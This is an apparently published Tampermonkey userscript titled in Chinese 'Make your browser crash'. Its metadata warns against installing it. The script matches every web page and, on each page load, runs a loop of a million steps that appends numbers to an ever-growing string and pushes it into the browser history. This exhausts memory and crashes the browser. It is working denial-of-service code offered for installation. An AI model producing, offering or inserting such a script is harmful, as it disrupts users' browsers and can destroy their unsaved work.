使你的浏览器崩溃

hi

// ==UserScript==
// @name         使你的浏览器崩溃
// @namespace    http://tampermonkey.net/
// @version      0.7
// @author       使你的浏览器不断死机,请勿安装,后果自负
// @description  hi
// @match http://*
// @match https://*
// @grant        none
// @license MIT
// ==/UserScript==
(function(){
  var total="";
for (var i=0;i<1000000;i++)
{
 total= total+i.toString();
 history.pushState(0,0,total);
}
})();